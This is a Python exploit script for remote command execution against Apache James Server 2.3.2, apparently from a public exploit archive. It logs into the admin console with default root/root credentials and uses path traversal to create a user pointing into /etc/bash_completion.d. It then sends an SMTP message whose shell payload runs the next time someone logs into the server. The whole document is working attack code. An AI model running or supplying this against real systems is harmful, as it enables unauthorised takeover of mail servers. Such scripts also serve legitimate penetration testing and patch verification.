Apache James Server 2.3.2 - Remote Command Execution

#!/usr/bin/python import socket import sys import time # specify payload #payload = 'touch /tmp/proof.txt' # to exploit on any user payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root # credentials to James Remote Administration Tool (Default - root/root) user = 'root' pwd = 'root' if len(sys.argv) != 2: sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0]) sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0]) sys.exit(1) ip = sys.argv[1] def recv(s): s.recv(1024) time.sleep(0.2) try: print "[+]Connecting to James Remote Administration Tool..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,4555)) s.recv(1024) s.send(user + "\n") s.recv(1024) s.send(pwd + "\n") s.recv(1024) print "[+]Creating user..." s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n") s.recv(1024) s.send("quit\n") s.close() print "[+]Connecting to James SMTP server..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,25)) s.send("ehlo team@team.pl\r\n") recv(s) print "[+]Sending payload..." s.send("mail from: <'@team.pl>\r\n") recv(s) # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n") recv(s) s.send("data\r\n") recv(s) s.send("From: team@team.pl\r\n") s.send("\r\n") s.send("'\n") s.send(payload + "\n") s.send("\r\n.\r\n") recv(s) s.send("quit\r\n") recv(s) s.close() print "[+]Done! Payload will be executed once somebody logs in." except: print "Connection failed."